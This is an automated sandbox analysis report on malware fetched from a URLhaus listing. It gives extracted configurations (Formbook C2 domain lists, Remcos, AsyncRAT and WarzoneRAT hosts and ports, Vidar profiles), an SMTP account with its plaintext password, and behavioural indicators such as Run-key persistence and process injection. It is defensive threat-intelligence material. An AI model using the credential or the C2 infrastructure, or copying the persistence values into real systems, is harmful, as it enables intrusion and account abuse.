Analysis
-
max time kernel
1713s
max time network
1749s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags
arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted
05-12-2022 22:14
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://urlhaus.abuse.ch/browse/tag/exe/
Resource
win10v2004-20220812-en
General
-
Target
https://urlhaus.abuse.ch/browse/tag/exe/
Malware Config
Extracted
C:\Program Files\7-Zip\History.txt
Extracted
Protocol: smtp
Host: smtp.leonardfood.com
Port: 587
Username: karimi@leonardfood.com
Password: K@rimi95
Extracted
formbook
4.1
8rmt
3472cc.com
takecareyourhair.com
kontolajigasd21.xyz
daihaitrinh.net
syncmostlatestinfo-file.info
lovesolutionsastrologist.info
angelapryan.com
rio727casino.com
jjsgagets.com
devyatkina.online
thegoldenbeautyqatar.com
czytaj-unas24live.monster
timepoachers.com
gayxxxporn.site
72308.xyz
kristanolivo.com
hijrahfwd.com
bmfighters.com
alfamx.website
handfulofbabesbows.com
nationalsocialism.link
mega-recarga-arg.com
rytstack.com
kfav77.xyz
rrexec.net
linetl.top
freedomcleaningusa.com
abofahad3478.tokyo
teamvalvolineeurope.com
kyty4265.com
afrikannaland.info
dharmatradinguae.com
bqylc.buzz
lifeprojectmanager.pro
streeteli.site
68fk.vip
wasemanntrucking.com
auracreitarusblog.com
dfgzyt.cyou
tecnotuto.net
ookkvip.com
247repairs.info
tyvwotnmrlpjgl.biz
courtneymporter.com
gildainterior.com
papiska.xyz
sparrow.run
tyh-group.com
april-zodiac-sign.info
kiaf1.site
cooleyes.live
partasa.com
connecticutinteriors.com
thelovehandles.us
netinseg.website
diaryranch.xyz
serenaderange.com
milano.icu
vapeseasy.com
hengruncosmetics.com
vlashon.com
masberlian.ink
djayadiwangsa.store
nicneni.xyz
ym2668.top
Extracted
warzonerat
baramac.duckdns.org:6269
Extracted
vidar
56
1672
https://t.me/asifrazatg
https://steamcommunity.com/profiles/76561199439929669
-
profile_id
1672
Extracted
formbook
4.1
h3ha
ideas-dulces.store
store1995.store
swuhn.com
ninideal.com
musiqhaus.com
quranchart.com
kszq26.club
lightfx.online
thetickettruth.com
meritloancubk.com
lawnforcement.com
sogeanetwork.com
thedinoexotics.com
kojima-ah.net
gr-myab3z.xyz
platiniuminestor.net
reviewsiske.com
stessil-lifestyle.com
goodqjourney.biz
cirimpianti.com
garsouurber.com
dakshaini.com
dingshuitong.com
pateme.com
diablographic.com
elenesse.com
neginoptical.com
junkremovalbedford.com
dunclearnia.bid
arabicadev.com
thelastsize.com
ku7web.net
chaijiaxia.com
shopnexvn.net
gacorking.asia
missmadddison.com
rigapyk.xyz
chain.place
nosesports.com
paymallmart.info
opi-utp.xyz
institutogdb.com
f819a.site
truefundd.com
producteight.com
quasetudo.store
littlelaughsandgiggles.com
rickhightower.com
urbaniteboffin.com
distributorolinasional.com
bcffji.xyz
wwwbaronhr.com
veridian-ae.com
luxeeventsny.net
freedom-hotline.com
lylaixin.com
mathematicalapologist.com
captivatortees.com
rb-premium.com
nairabet365.com
b2cfaq.com
sunroadrunning.com
centaurusvaccination.com
lamegatienda.online
fucktheenemy.com
Extracted
remcos
MONDAYHost BLESS
aryexpcrt.ddns.net:3216
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-6PETGK
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
Extracted
remcos
ThirdClients
79.134.225.97:1558
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
appsync.exe
-
copy_folder
Appsync
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
Appsync
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
Appsync-00ARH2
-
screenshot_crypt
false
-
screenshot_flag
true
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Appsync
-
take_screenshot_option
true
-
take_screenshot_time
55
-
take_screenshot_title
mail;webmail;crypto;btc;ethereum;bitcoin;eth;outlook;foxmail;bank;email;compose;
Extracted
asyncrat
0.5.7B
System Guard Runtime
85.105.88.221:2531
System Guard Runtime
-
delay
3
-
install
false
-
install_file
System Guard Runtime
-
install_folder
%AppData%
Extracted
asyncrat
0.5.7B
DefenderSmartScren
217.64.31.3:8437
DefenderSmartScren
-
delay
3
-
install
false
-
install_file
SecurityHealtheurvice.exe
-
install_folder
%AppData%
Extracted
vidar
56
1364
https://t.me/asifrazatg
https://steamcommunity.com/profiles/76561199439929669
-
profile_id
1364
Signatures
-
DcRat
DarkCrystal (DC) is a new .NET RAT, active since June 2019, capable of loading additional plugins.
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\Miriuk\\Miruik.exe," | reg.exe
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Async RAT payload 2 IoCs
Processes:
resource | yara_rule
behavioral1/memory/4552-404-0x0000000000400000-0x0000000000412000-memory.dmp | asyncrat
behavioral1/memory/5444-434-0x0000000000400000-0x0000000000412000-memory.dmp | asyncrat
-
Formbook payload 6 IoCs
Processes:
resource | yara_rule
behavioral1/memory/3960-141-0x0000000000400000-0x000000000042F000-memory.dmp | formbook
behavioral1/memory/3960-146-0x0000000000400000-0x000000000042F000-memory.dmp | formbook
behavioral1/memory/4844-149-0x0000000000F80000-0x0000000000FAF000-memory.dmp | formbook
behavioral1/memory/4844-152-0x0000000000F80000-0x0000000000FAF000-memory.dmp | formbook
behavioral1/memory/1848-222-0x0000000000480000-0x00000000004AF000-memory.dmp | formbook
behavioral1/memory/1848-223-0x0000000000480000-0x00000000004AF000-memory.dmp | formbook
-
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource | yara_rule
behavioral1/memory/3476-288-0x0000000000400000-0x0000000000457000-memory.dmp | MailPassView
-
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
Processes:
resource | yara_rule
behavioral1/memory/1532-290-0x0000000000400000-0x0000000000478000-memory.dmp | WebBrowserPassView
behavioral1/memory/1532-293-0x0000000000400000-0x0000000000478000-memory.dmp | WebBrowserPassView
-
Nirsoft 4 IoCs
Processes:
resource | yara_rule
behavioral1/memory/380-287-0x0000000000400000-0x0000000000424000-memory.dmp | Nirsoft
behavioral1/memory/3476-288-0x0000000000400000-0x0000000000457000-memory.dmp | Nirsoft
behavioral1/memory/1532-290-0x0000000000400000-0x0000000000478000-memory.dmp | Nirsoft
behavioral1/memory/1532-293-0x0000000000400000-0x0000000000478000-memory.dmp | Nirsoft
-
Warzone RAT payload 2 IoCs
Processes:
resource | yara_rule
behavioral1/memory/2560-168-0x0000000000400000-0x000000000041D000-memory.dmp | warzonerat
behavioral1/memory/2560-176-0x0000000000400000-0x000000000041D000-memory.dmp | warzonerat
-
XMRig Miner payload 5 IoCs
Processes:
resource | yara_rule
behavioral1/memory/5472-396-0x0000000140000000-0x00000001407C9000-memory.dmp | xmrig
behavioral1/memory/5472-397-0x0000000140000000-0x00000001407C9000-memory.dmp | xmrig
behavioral1/memory/5472-398-0x0000000140000000-0x00000001407C9000-memory.dmp | xmrig
behavioral1/memory/5860-414-0x0000000140000000-0x00000001407C9000-memory.dmp | xmrig
behavioral1/memory/5860-416-0x0000000140000000-0x00000001407C9000-memory.dmp | xmrig
-
Adds policy Run key to start application 2 TTPs 2 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | cmmon32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\XN0XN08XG = "C:\\Program Files (x86)\\Gkdv\\yx8pgdl0px.exe" | cmmon32.exe
-
Blocklisted process makes network request 22 IoCs
Processes:
flow | pid | process
325 | 4844 | cmstp.exe
374 | 2576 | powershell.exe
375 | 2888 | powershell.exe
384 | 444 | powershell.exe
396 | 4388 | powershell.exe
417 | 3676 | powershell.exe
426 | 5336 | powershell.exe
441 | 5476 | powershell.exe
449 | 5692 | powershell.exe
462 | 6088 | powershell.exe
602 | 724 | powershell.exe
670 | 6140 | powershell.exe
739 | 4844 | cmstp.exe
809 | 5068 | powershell.exe
1031 | 2852 | powershell.exe
1052 | 3096 | powershell.exe
1067 | 5412 | powershell.exe
1133 | 4324 | powershell.exe
1149 | 5228 | powershell.exe
1170 | 3880 | powershell.exe
3124 | 1500 | rundll32.exe
3419 | 2280 | rundll32.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
pid | process
2528 | alaat2.1.exe
3964 | ycayuhnew.exe
3960 | ycayuhnew.exe
1372 | makanaki.exe
3872 | zgoqp.exe
2560 | zgoqp.exe
2312 | vbc.exe
424 | build.exe
2920 | jeymo2.1.exe
1748 | enqnjvfa.exe
524 | enqnjvfa.exe
4892 | vbc(1).exe
2172 | vbc(2).exe
4836 | Miruik.exe
4824 | newversion2.exe
3896 | vbc(2).exe
3376 | RustExternal%u202Enls..scr
1084 | DEFENDERFILESECURITY.EXE
1232 | 0.exe
2716 | uQIyezHYEb.exe
1416 | sSHdLPmGvR.exe
4192 | gWp3Y1Z5zl.exe
3012 | MsLpqg1mkp.exe
4904 | 35JrmltklD.exe
4276 | 4daUBDWNly.exe
5140 | NOTEPAD.EXE
5344 | fJLyuMh29f.exe
5788 | z4BWkjnInT.exe
5852 | RCAHrSufv7.exe
5996 | UPuzEwySUY.exe
4660 | JDSG4.exe
5852 | JDSG3.exe
2464 | 614.exe
4488 | JDSDS4.exe
5836 | 8.exe
1484 | svchosts.exe
4640 | POSA12.exe
5008 | MNZXHA36.exe
3784 | POIXCB3.exe
1936 | norza.exe
2988 | xrfqtvbjh.exe
3188 | xrfqtvbjh.exe
5556 | BVNMXCGHJ7.exe
368 | JDSG3.exe
2288 | JDSDS4.exe
3520 | 7.exe
5284 | QHGJASD27.exe
6072 | LKSJDSAKDQ.exe
2664 | LKXMNBZX55.exe
5892 | 60E0G7UKRntM1TQ.exe
5276 | LKXMNX55.exe
2992 | BVNMXCGHJ7.exe
3448 | JDSG3.exe
5784 | JDSDS4.exe
3636 | 60E0G7UKRntM1TQ.exe
4152 | Miljoeministeren.exe
1580 | 0.exe
5560 | gKHZUfqcLT.exe
5764 | KTsJHXYseh.exe
5212 | 35JrmltklD.exe
5624 | EcS04le5nj.exe
5420 | sgq83QQfG4.exe
5996 | RJPrfsm7fj.exe
4308 | TdAEHN5fwV.exe
-
Registers COM server for autorun 1 TTPs 6 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" | 60E0G7UKRntM1TQ.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | 60E0G7UKRntM1TQ.exe
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID\{635EFA6F-08D6-4EC9-BD14-8A0FDE975159}\LocalServer32 | setup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID\{635EFA6F-08D6-4EC9-BD14-8A0FDE975159}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Chromnius\\Application\\109.0.5386.0\\notification_helper.exe\"" | setup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID\{635EFA6F-08D6-4EC9-BD14-8A0FDE975159}\LocalServer32\ServerExecutable = "C:\\Users\\Admin\\AppData\\Local\\Chromnius\\Application\\109.0.5386.0\\notification_helper.exe" | setup.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | 60E0G7UKRntM1TQ.exe
-
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE | upx
C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE | upx
behavioral1/memory/1084-308-0x00007FF618CA0000-0x00007FF618DFF000-memory.dmp | upx
behavioral1/memory/1084-311-0x00007FF618CA0000-0x00007FF618DFF000-memory.dmp | upx
C:\Users\Admin\AppData\Local\Temp\0.exe | upx
C:\Users\Admin\AppData\Local\Temp\0.exe | upx
behavioral1/memory/1232-315-0x00007FF7BCCB0000-0x00007FF7BCE13000-memory.dmp | upx
-
Checks computer location settings 2 TTPs 35 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | 4daUBDWNly.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | fJLyuMh29f.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | sSHdLPmGvR.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | tord.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | z4BWkjnInT.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | UPuzEwySUY.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | gntuud.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | vbc(2).exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | oVvR0Kg0to.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | IAWbmRKnNw.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | chromnius.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | 35JrmltklD.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | gKHZUfqcLT.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | RJPrfsm7fj.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | yoMEITfbTK.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | linda5.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | chromnius.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | 60E0G7UKRntM1TQ.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | RegAsm.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | RCAHrSufv7.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | zmmP77vsYU.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | chromnius.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | chromnius.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | newversion2.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | build.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | gWp3Y1Z5zl.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | MsLpqg1mkp.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | KTsJHXYseh.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | 35JrmltklD.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | EcS04le5nj.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | sgq83QQfG4.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | TdAEHN5fwV.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | uQIyezHYEb.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | chromnius.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | file.exe
-
Loads dropped DLL 64 IoCs
Processes:
pid | process
424 | build.exe
424 | build.exe
5136 | InstallUtil.exe
5136 | InstallUtil.exe
4152 | Miljoeministeren.exe (this row repeats for every remaining entry, 64 entries in total)
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook accounts 1 TTPs 6 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | 60E0G7UKRntM1TQ.exe
Key opened | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | 60E0G7UKRntM1TQ.exe
Key opened | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | AddInProcess32.exe
Key opened | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | 60E0G7UKRntM1TQ.exe
Key opened | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | 60E0G7UKRntM1TQ.exe
Key opened | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | 60E0G7UKRntM1TQ.exe
-
Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | rundll32.exe
Key opened | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Regsvcs.exe
Key opened | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Regsvcs.exe
Key opened | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Regsvcs.exe
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 14 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CRYPTED_BSI20221205.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000026001\\CRYPTED_BSI20221205.exe" | gntuud.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\osoudspt = "C:\\Users\\Admin\\AppData\\Roaming\\tdvtqndxxhl\\kiflb.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\zgoqp.exe\" C:\\Users\\Admin\\AppData\\Local\\Te" | zgoqp.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\oivwlrhyk = "C:\\Users\\Admin\\AppData\\Roaming\\hprllbdymxpxuh\\cbsfkgnxd.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\xrfqtvbjh.exe\" C:\\Users\\Admin\\AppDa" | xrfqtvbjh.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsFilerar = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsFilerar\\WindowsFilerar.exe" | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\A46HZLVHFTS4 = "C:\\Program Files (x86)\\Ssnrt\\7no04fld0or5.exe" | cmstp.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wish.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000028001\\wish.exe" | gntuud.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhosts = "\"C:\\Users\\Admin\\Downloads\\614.exe\"" | 614.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealthService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthService\\SecurityHealthService.exe" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pigalicapi = "C:\\Users\\Admin\\pigalicapi.exe" | 7.exe
Key created | \Registry\Machine\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | cmstp.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemGuardRuntime = "C:\\Users\\Admin\\AppData\\Roaming\\SystemGuardRuntime\\SystemGuardRuntime.exe" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhosts = "\"C:\\Users\\Admin\\AppData\\Roaming\\subdir\\svchosts.exe\"" | svchosts.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OperaSetups = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker\\RuntimeBroker.exe" | POIXCB3.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\linda5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000027001\\linda5.exe" | gntuud.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
393 | ip-api.com
-
Drops file in System32 directory 1 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\Unmetallic.ini | Miljoeministeren.exe
-
Suspicious use of SetThreadContext 64 IoCs
Processes:
description | pid | process | target process
PID 3964 set thread context of 3960 | 3964 | ycayuhnew.exe | ycayuhnew.exe
PID 3960 set thread context of 3064 | 3960 | ycayuhnew.exe | Explorer.EXE
PID 4844 set thread context of 3064 | 4844 | cmstp.exe | Explorer.EXE
PID 4844 set thread context of 4860 | 4844 | cmstp.exe | firefox.exe
PID 3872 set thread context of 2560 | 3872 | zgoqp.exe | zgoqp.exe
PID 4844 set thread context of 1280 | 4844 | cmstp.exe | firefox.exe
PID 4844 set thread context of 3648 | 4844 | cmstp.exe | firefox.exe
PID 4844 set thread context of 4504 | 4844 | cmstp.exe | firefox.exe
PID 1748 set thread context of 524 | 1748 | enqnjvfa.exe | enqnjvfa.exe
PID 524 set thread context of 3064 | 524 | enqnjvfa.exe | Explorer.EXE
PID 2172 set thread context of 3896 | 2172 | vbc(2).exe | vbc(2).exe
PID 4824 set thread context of 1432 | 4824 | newversion2.exe | InstallUtil.exe
PID 4836 set thread context of 4700 | 4836 | Miruik.exe | AddInProcess32.exe
PID 4700 set thread context of 1532 | 4700 | AddInProcess32.exe | AddInProcess32.exe
PID 4700 set thread context of 3476 | 4700 | AddInProcess32.exe | AddInProcess32.exe
PID 4700 set thread context of 380 | 4700 | AddInProcess32.exe | AddInProcess32.exe
PID 3376 set thread context of 4944 | 3376 | RustExternal%u202Enls..scr | RegAsm.exe
PID 4844 set thread context of 5140 | 4844 | cmstp.exe | NOTEPAD.EXE
PID 1432 set thread context of 5472 | 1432 | InstallUtil.exe | AddInProcess.exe
PID 4660 set thread context of 4552 | 4660 | JDSG4.exe | RegAsm.exe
PID 1432 set thread context of 5860 | 1432 | InstallUtil.exe | AddInProcess.exe
PID 4640 set thread context of 5444 | 4640 | POSA12.exe | RegAsm.exe
PID 5852 set thread context of 5044 | 5852 | JDSG3.exe | RegAsm.exe
PID 4488 set thread context of 4624 | 4488 | JDSDS4.exe | RegAsm.exe
PID 5836 set thread context of 5136 | 5836 | 8.exe | InstallUtil.exe
PID 2988 set thread context of 3188 | 2988 | xrfqtvbjh.exe | xrfqtvbjh.exe
PID 5284 set thread context of 5680 | 5284 | QHGJASD27.exe | RegAsm.exe
PID 5556 set thread context of 5340 | 5556 | BVNMXCGHJ7.exe | RegAsm.exe
PID 368 set thread context of 804 | 368 | JDSG3.exe | RegAsm.exe
PID 2288 set thread context of 2988 | 2288 | JDSDS4.exe | RegAsm.exe
PID 3520 set thread context of 4144 | 3520 | 7.exe | svchost.exe
PID 2664 set thread context of 5500 | 2664 | LKXMNBZX55.exe | RegAsm.exe
PID 3520 set thread context of 6120 | 3520 | 7.exe | svchost.exe
PID 5892 set thread context of 3636 | 5892 | 60E0G7UKRntM1TQ.exe | 60E0G7UKRntM1TQ.exe
PID 2992 set thread context of 5212 | 2992 | BVNMXCGHJ7.exe | RegAsm.exe
PID 5784 set thread context of 1132 | 5784 | JDSDS4.exe | RegAsm.exe
PID 3448 set thread context of 1108 | 3448 | JDSG3.exe | RegAsm.exe
PID 7124 set thread context of 6244 | 7124 | JDSG4.exe | RegAsm.exe
PID 6384 set thread context of 6752 | 6384 | JDSG3.exe | RegAsm.exe
PID 6892 set thread context of 6984 | 6892 | POSA12.exe | RegAsm.exe
PID 7108 set thread context of 6236 | 7108 | JDSG3.exe | RegAsm.exe
PID 6396 set thread context of 6312 | 6396 | JDSDS4.exe | RegAsm.exe
PID 6836 set thread context of 6592 | 6836 | BVNMXCGHJ7.exe | RegAsm.exe
PID 4844 set thread context of 1192 | 4844 | cmstp.exe | firefox.exe
PID 6896 set thread context of 5232 | 6896 | JDSDS4.exe | RegAsm.exe
PID 5900 set thread context of 7072 | 5900 | QHGJASD27.exe | RegAsm.exe
PID 6764 set thread context of 4020 | 6764 | BVNMXCGHJ7.exe | RegAsm.exe
PID 1432 set thread context of 4864 | 1432 | InstallUtil.exe | AddInProcess.exe
PID 6920 set thread context of 4520 | 6920 | LKXMNBZX55.exe | RegAsm.exe
PID 5956 set thread context of 1332 | 5956 | BVNMXCGHJ7.exe | RegAsm.exe
PID 5500 set thread context of 4960 | 5500 | JDSG3.exe | RegAsm.exe
PID 5472 set thread context of 2576 | 5472 | JDSDS4.exe | RegAsm.exe
